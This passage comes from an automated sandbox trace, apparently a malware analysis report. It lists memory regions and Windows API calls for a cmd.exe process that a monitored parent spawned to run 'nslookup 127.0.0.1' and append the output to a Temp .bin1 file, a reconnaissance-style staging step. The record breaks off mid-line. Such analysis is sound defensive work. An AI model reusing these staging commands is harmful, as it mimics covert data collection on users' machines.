"\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2907 start_va = 0x7ff977720000 end_va = 0x7ff977755fff entry_point = 0x7ff977720000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2908 start_va = 0x7ff977760000 end_va = 0x7ff97781dfff entry_point = 0x7ff977760000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2909 start_va = 0x7ff977830000 end_va = 0x7ff977aabfff entry_point = 0x7ff977830000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2910 start_va = 0x7ff977b60000 end_va = 0x7ff977ca0fff entry_point = 0x7ff977b60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2911 start_va = 0x7ff977df0000 end_va = 0x7ff977f15fff entry_point = 0x7ff977df0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 254 os_tid = 0x414 Thread: id = 255 os_tid = 0x544 Thread: id = 256 os_tid = 0x35c Process: id = "31" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x3d049000" os_pid = "0x420" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x834" cmd_line = "cmd /C \"nslookup 127.0.0.1 >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2928 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2929 start_va = 0xa1b5800000 end_va = 0xa1b581ffff entry_point = 0x0 region_type = private name = "private_0x000000a1b5800000" filename = "" Region: id = 2930 start_va = 0xa1b5820000 end_va = 0xa1b5833fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a1b5820000" filename = "" Region: id = 2931 start_va = 0xa1b5840000 end_va = 0xa1b593ffff entry_point = 0x0 region_type = private name = "private_0x000000a1b5840000" filename = "" Region: id = 2932 start_va = 0xa1b5940000 end_va = 0xa1b5943fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a1b5940000" filename = "" Region: id = 2933 start_va = 0xa1b5950000 end_va = 0xa1b5950fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a1b5950000" filename = "" Region: id = 2934 start_va = 0xa1b5960000 end_va = 0xa1b5961fff entry_point = 0x0 region_type = private name = "private_0x000000a1b5960000" filename = "" Region: id = 2935 start_va = 0x7df5ff0b0000 end_va = 0x7ff5ff0affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff0b0000" filename = "" Region: id = 2936 start_va = 0x7ff60d7d0000 end_va = 0x7ff60d7f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff60d7d0000" filename = "" Region: id = 2937 start_va = 0x7ff60d7fc000 end_va = 0x7ff60d7fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff60d7fc000" filename = "" Region: id = 2938 start_va = 0x7ff60d7fe000 end_va = 0x7ff60d7fefff entry_point = 0x0 region_type = private name = "private_0x00007ff60d7fe000" filename = "" Region: id = 2939 start_va = 0x7ff60d9c0000 end_va = 0x7ff60da18fff entry_point = 0x7ff60d9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 2940 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2941 start_va = 0xa1b5aa0000 end_va = 0xa1b5b9ffff entry_point = 0x0 region_type = private name = "private_0x000000a1b5aa0000" filename = "" Region: id = 2942 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2943 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2983 start_va = 0xa1b5800000 end_va = 0xa1b580ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a1b5800000" filename = "" Region: id = 2984 start_va = 0xa1b5810000 end_va = 0xa1b5816fff entry_point = 0x0 region_type = private name = "private_0x000000a1b5810000" filename = "" Region: id = 2985 start_va = 0xa1b5970000 end_va = 0xa1b5a2dfff entry_point = 0xa1b5970000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2986 start_va = 0xa1b5ba0000 end_va = 0xa1b5c9ffff entry_point = 0x0 region_type = private name = "private_0x000000a1b5ba0000" filename = "" Region: id = 2987 start_va = 0xa1b5df0000 end_va = 0xa1b5dfffff entry_point = 0x0 region_type = private name = "private_0x000000a1b5df0000" filename = "" Region: id = 2988 start_va = 0x7ff60d6d0000 end_va = 0x7ff60d7cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff60d6d0000" filename = "" Region: id = 2989 start_va = 0x7ff60d7fa000 end_va = 0x7ff60d7fbfff entry_point = 0x0 region_type = private name = "private_0x00007ff60d7fa000" filename = "" Region: id = 2990 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2991 start_va = 0xa1b5a30000 end_va = 0xa1b5a36fff entry_point = 0x0 region_type = private name = "private_0x000000a1b5a30000" filename = "" Region: id = 2992 start_va = 0xa1b5e00000 end_va = 0xa1b6136fff entry_point = 0xa1b5e00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 258 os_tid = 0x3a0 [0276.611] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff60d9c0000 [0276.611] __set_app_type (_Type=0x1) [0276.611] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff60d9d44a0) returned 0x0 [0276.612] __getmainargs (in: _Argc=0x7ff60d9ef0e8, _Argv=0x7ff60d9ef0f0, _Env=0x7ff60d9ef0f8, _DoWildCard=0, _StartInfo=0x7ff60d9ef104 | out: _Argc=0x7ff60d9ef0e8, _Argv=0x7ff60d9ef0f0, _Env=0x7ff60d9ef0f8) returned 0 [0276.612] GetCurrentThreadId () returned 0x3a0 [0276.612] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x3a0) returned 0x6c [0276.612] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0276.612] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="SetThreadUILanguage") returned 0x7ff977acd550 [0276.612] SetThreadUILanguage (LangId=0x0) returned 0x409 [0276.615] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0276.615] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xa1b593f808 | out: phkResult=0xa1b593f808*=0x0) returned 0x2 [0276.615] VirtualQuery (in: lpAddress=0xa1b593f7f4, lpBuffer=0xa1b593f770, dwLength=0x30 | out: lpBuffer=0xa1b593f770*(BaseAddress=0xa1b593f000, AllocationBase=0xa1b5840000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0276.615] VirtualQuery (in: lpAddress=0xa1b5840000, lpBuffer=0xa1b593f770, dwLength=0x30 | out: lpBuffer=0xa1b593f770*(BaseAddress=0xa1b5840000, AllocationBase=0xa1b5840000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0276.615] VirtualQuery (in: lpAddress=0xa1b5841000, lpBuffer=0xa1b593f770, dwLength=0x30 | out: lpBuffer=0xa1b593f770*(BaseAddress=0xa1b5841000, AllocationBase=0xa1b5840000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0276.615] VirtualQuery (in: lpAddress=0xa1b5844000, lpBuffer=0xa1b593f770, dwLength=0x30 | out: lpBuffer=0xa1b593f770*(BaseAddress=0xa1b5844000, AllocationBase=0xa1b5840000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0276.615] VirtualQuery (in: lpAddress=0xa1b5940000, lpBuffer=0xa1b593f770, dwLength=0x30 | out: lpBuffer=0xa1b593f770*(BaseAddress=0xa1b5940000, AllocationBase=0xa1b5940000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0xffffd000)) returned 0x30 [0276.615] GetConsoleOutputCP () returned 0x1b5 [0276.616] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff60d9f8640 | out: lpCPInfo=0x7ff60d9f8640) returned 1 [0276.616] SetConsoleCtrlHandler (HandlerRoutine=0x7ff60d9e15d0, Add=1) returned 1 [0276.616] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.616] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x0) returned 1 [0276.616] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.617] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff60d9f85ec | out: lpMode=0x7ff60d9f85ec) returned 1 [0276.617] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.617] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x3) returned 1 [0276.617] _get_osfhandle (_FileHandle=0) returned 0x20 [0276.617] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff60d9f85e8 | out: lpMode=0x7ff60d9f85e8) returned 1 [0276.617] _get_osfhandle (_FileHandle=0) returned 0x20 [0276.617] SetConsoleMode (hConsoleHandle=0x20, dwMode=0x1e7) returned 1 [0276.618] GetEnvironmentStringsW () returned 0xa1b5aa56b0* [0276.618] FreeEnvironmentStringsA (penv="=") returned 1 [0276.618] GetEnvironmentStringsW () returned 0xa1b5aa56b0* [0276.618] FreeEnvironmentStringsA (penv="=") returned 1 [0276.618] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xa1b593e6b8 | out: phkResult=0xa1b593e6b8*=0x78) returned 0x0 [0276.619] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xa1b593e6b0, lpData=0xa1b593e6d0, lpcbData=0xa1b593e6b4*=0x1000 | out: lpType=0xa1b593e6b0*=0x0, lpData=0xa1b593e6d0*=0x1, lpcbData=0xa1b593e6b4*=0x1000) returned 0x2 [0276.619] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xa1b593e6b0, lpData=0xa1b593e6d0, lpcbData=0xa1b593e6b4*=0x1000 | out: lpType=0xa1b593e6b0*=0x4, lpData=0xa1b593e6d0*=0x1, lpcbData=0xa1b593e6b4*=0x4) returned 0x0 [0276.619] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xa1b593e6b0, lpData=0xa1b593e6d0, lpcbData=0xa1b593e6b4*=0x1000 | out: lpType=0xa1b593e6b0*=0x0, lpData=0xa1b593e6d0*=0x1, lpcbData=0xa1b593e6b4*=0x1000) returned 0x2 [0276.619] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xa1b593e6b0, lpData=0xa1b593e6d0, lpcbData=0xa1b593e6b4*=0x1000 | out: lpType=0xa1b593e6b0*=0x4, lpData=0xa1b593e6d0*=0x0, lpcbData=0xa1b593e6b4*=0x4) returned 0x0 [0276.619] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xa1b593e6b0, lpData=0xa1b593e6d0, lpcbData=0xa1b593e6b4*=0x1000 | out: lpType=0xa1b593e6b0*=0x4, lpData=0xa1b593e6d0*=0x40, lpcbData=0xa1b593e6b4*=0x4) returned 0x0 [0276.619] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xa1b593e6b0, lpData=0xa1b593e6d0, lpcbData=0xa1b593e6b4*=0x1000 | out: lpType=0xa1b593e6b0*=0x4, lpData=0xa1b593e6d0*=0x40, lpcbData=0xa1b593e6b4*=0x4) returned 0x0 [0276.619] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0xa1b593e6b0, lpData=0xa1b593e6d0, lpcbData=0xa1b593e6b4*=0x1000 | out: lpType=0xa1b593e6b0*=0x0, lpData=0xa1b593e6d0*=0x40, lpcbData=0xa1b593e6b4*=0x1000) returned 0x2 [0276.619] RegCloseKey (hKey=0x78) returned 0x0 [0276.619] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xa1b593e6b8 | out: phkResult=0xa1b593e6b8*=0x78) returned 0x0 [0276.619] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xa1b593e6b0, lpData=0xa1b593e6d0, lpcbData=0xa1b593e6b4*=0x1000 | out: lpType=0xa1b593e6b0*=0x0, lpData=0xa1b593e6d0*=0x40, lpcbData=0xa1b593e6b4*=0x1000) returned 0x2 [0276.619] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xa1b593e6b0, lpData=0xa1b593e6d0, lpcbData=0xa1b593e6b4*=0x1000 | out: lpType=0xa1b593e6b0*=0x4, lpData=0xa1b593e6d0*=0x1, lpcbData=0xa1b593e6b4*=0x4) returned 0x0 [0276.619] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xa1b593e6b0, lpData=0xa1b593e6d0, lpcbData=0xa1b593e6b4*=0x1000 | out: lpType=0xa1b593e6b0*=0x0, lpData=0xa1b593e6d0*=0x1, lpcbData=0xa1b593e6b4*=0x1000) returned 0x2 [0276.619] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xa1b593e6b0, lpData=0xa1b593e6d0, lpcbData=0xa1b593e6b4*=0x1000 | out: lpType=0xa1b593e6b0*=0x4, lpData=0xa1b593e6d0*=0x0, lpcbData=0xa1b593e6b4*=0x4) returned 0x0 [0276.619] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xa1b593e6b0, lpData=0xa1b593e6d0, lpcbData=0xa1b593e6b4*=0x1000 | out: lpType=0xa1b593e6b0*=0x4, lpData=0xa1b593e6d0*=0x9, lpcbData=0xa1b593e6b4*=0x4) returned 0x0 [0276.619] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xa1b593e6b0, lpData=0xa1b593e6d0, lpcbData=0xa1b593e6b4*=0x1000 | out: lpType=0xa1b593e6b0*=0x4, lpData=0xa1b593e6d0*=0x9, lpcbData=0xa1b593e6b4*=0x4) returned 0x0 [0276.619] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0xa1b593e6b0, lpData=0xa1b593e6d0, lpcbData=0xa1b593e6b4*=0x1000 | out: lpType=0xa1b593e6b0*=0x0, lpData=0xa1b593e6d0*=0x9, lpcbData=0xa1b593e6b4*=0x1000) returned 0x2 [0276.619] RegCloseKey (hKey=0x78) returned 0x0 [0276.619] time (in: timer=0x0 | out: timer=0x0) returned 0x5be0e013 [0276.619] srand (_Seed=0x5be0e013) [0276.620] GetCommandLineW () returned="cmd /C \"nslookup 127.0.0.1 >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"" [0276.620] GetCommandLineW () returned="cmd /C \"nslookup 127.0.0.1 >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"" [0276.620] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff60da00920 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0276.620] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xa1b5aa7820, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0276.620] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0276.620] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0276.620] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0276.620] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0276.620] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0276.620] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0276.620] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0276.620] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0276.620] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0276.620] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0276.620] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0276.620] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0276.621] GetEnvironmentStringsW () returned 0xa1b5aa56b0* [0276.621] FreeEnvironmentStringsA (penv="=") returned 1 [0276.621] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0276.621] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0276.621] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0276.621] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0276.621] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0276.621] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0276.621] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0276.621] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0276.621] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0276.621] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0276.621] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa1b593f4c0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0276.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0xa1b593f4c0, lpFilePart=0xa1b593f4a0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0xa1b593f4a0*="system32") returned 0x13 [0276.622] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0276.622] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0xa1b593f1d0 | out: lpFindFileData=0xa1b593f1d0) returned 0xa1b5aa0720 [0276.623] FindClose (in: hFindFile=0xa1b5aa0720 | out: hFindFile=0xa1b5aa0720) returned 1 [0276.623] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0xa1b593f1d0 | out: lpFindFileData=0xa1b593f1d0) returned 0xa1b5aa0720 [0276.624] FindClose (in: hFindFile=0xa1b5aa0720 | out: hFindFile=0xa1b5aa0720) returned 1 [0276.624] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0276.624] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0276.624] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0276.624] GetEnvironmentStringsW () returned 0xa1b5aa7a30* [0276.624] FreeEnvironmentStringsA (penv="=") returned 1 [0276.624] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff60da00920 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0276.626] GetConsoleOutputCP () returned 0x1b5 [0276.626] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff60d9f8640 | out: lpCPInfo=0x7ff60d9f8640) returned 1 [0276.626] GetUserDefaultLCID () returned 0x409 [0276.626] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff60d9fc680, cchData=8 | out: lpLCData=":") returned 2 [0276.626] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xa1b593f5f0, cchData=128 | out: lpLCData="0") returned 2 [0276.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xa1b593f5f0, cchData=128 | out: lpLCData="0") returned 2 [0276.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xa1b593f5f0, cchData=128 | out: lpLCData="1") returned 2 [0276.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff60d9fc690, cchData=8 | out: lpLCData="/") returned 2 [0276.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff60d9fc6e0, cchData=32 | out: lpLCData="Mon") returned 4 [0276.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff60d9fc720, cchData=32 | out: lpLCData="Tue") returned 4 [0276.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff60d9fc760, cchData=32 | out: lpLCData="Wed") returned 4 [0276.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff60d9fc7a0, cchData=32 | out: lpLCData="Thu") returned 4 [0276.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff60d9fc7e0, cchData=32 | out: lpLCData="Fri") returned 4 [0276.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff60d9fc820, cchData=32 | out: lpLCData="Sat") returned 4 [0276.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff60d9fc860, cchData=32 | out: lpLCData="Sun") returned 4 [0276.627] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff60d9fc6a0, cchData=8 | out: lpLCData=".") returned 2 [0276.627] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff60d9fc6c0, cchData=8 | out: lpLCData=",") returned 2 [0276.627] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0276.628] GetConsoleTitleW (in: lpConsoleTitle=0xa1b5aa1120, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0276.628] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0276.628] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="CopyFileExW") returned 0x7ff977ad25e0 [0276.628] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="IsDebuggerPresent") returned 0x7ff977ad1f90 [0276.628] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="SetConsoleInputExeNameW") returned 0x7ff975423a10 [0276.629] _wcsicmp (_String1="nslookup", _String2=")") returned 69 [0276.630] _wcsicmp (_String1="FOR", _String2="nslookup") returned -8 [0276.630] _wcsicmp (_String1="FOR/?", _String2="nslookup") returned -8 [0276.630] _wcsicmp (_String1="IF", _String2="nslookup") returned -5 [0276.630] _wcsicmp (_String1="IF/?", _String2="nslookup") returned -5 [0276.630] _wcsicmp (_String1="REM", _String2="nslookup") returned 4 [0276.630] _wcsicmp (_String1="REM/?", _String2="nslookup") returned 4 [0276.634] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.634] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.634] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.634] GetFileType (hFile=0x24) returned 0x2 [0276.634] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0276.634] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xa1b593f4b8 | out: lpMode=0xa1b593f4b8) returned 1 [0276.635] _dup (_FileHandle=1) returned 3 [0276.635] _close (_FileHandle=1) returned 0 [0276.635] _wcsicmp (_String1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1", _String2="con") returned -53 [0276.635] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\19e9.bin1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0xa1b593f450, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24 [0276.635] _open_osfhandle (_OSFileHandle=0x24, _Flags=8) returned 1 [0276.635] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.635] GetFileType (hFile=0x24) returned 0x1 [0276.635] GetFileSize (in: hFile=0x24, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x862 [0276.635] SetFilePointer (in: hFile=0x24, lDistanceToMove=-1, lpDistanceToMoveHigh=0xa1b593f4b8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xa1b593f4b8*=0) returned 0x861 [0276.635] ReadFile (in: hFile=0x24, lpBuffer=0xa1b593f4c0, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xa1b593f4c8, lpOverlapped=0x0 | out: lpBuffer=0xa1b593f4c0*, lpNumberOfBytesRead=0xa1b593f4c8*=0x1, lpOverlapped=0x0) returned 1 [0276.635] GetConsoleTitleW (in: lpConsoleTitle=0xa1b593f4e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0276.636] _wcsicmp (_String1="nslookup", _String2="DIR") returned 10 [0276.636] _wcsicmp (_String1="nslookup", _String2="ERASE") returned 9 [0276.636] _wcsicmp (_String1="nslookup", _String2="DEL") returned 10 [0276.636] _wcsicmp (_String1="nslookup", _String2="TYPE") returned -6 [0276.636] _wcsicmp (_String1="nslookup", _String2="COPY") returned 11 [0276.636] _wcsicmp (_String1="nslookup", _String2="CD") returned 11 [0276.636] _wcsicmp (_String1="nslookup", _String2="CHDIR") returned 11 [0276.636] _wcsicmp (_String1="nslookup", _String2="RENAME") returned -4 [0276.636] _wcsicmp (_String1="nslookup", _String2="REN") returned -4 [0276.636] _wcsicmp (_String1="nslookup", _String2="ECHO") returned 9 [0276.636] _wcsicmp (_String1="nslookup", _String2="SET") returned -5 [0276.636] _wcsicmp (_String1="nslookup", _String2="PAUSE") returned -2 [0276.636] _wcsicmp (_String1="nslookup", _String2="DATE") returned 10 [0276.636] _wcsicmp (_String1="nslookup", _String2="TIME") returned -6 [0276.636] _wcsicmp (_String1="nslookup", _String2="PROMPT") returned -2 [0276.636] _wcsicmp (_String1="nslookup", _String2="MD") returned 1 [0276.636] _wcsicmp (_String1="nslookup", _String2="MKDIR") returned 1 [0276.636] _wcsicmp (_String1="nslookup", _String2="RD") returned -4 [0276.636] _wcsicmp (_String1="nslookup", _String2="RMDIR") returned -4 [0276.636] _wcsicmp (_String1="nslookup", _String2="PATH") returned -2 [0276.637] _wcsicmp (_String1="nslookup", _String2="GOTO") returned 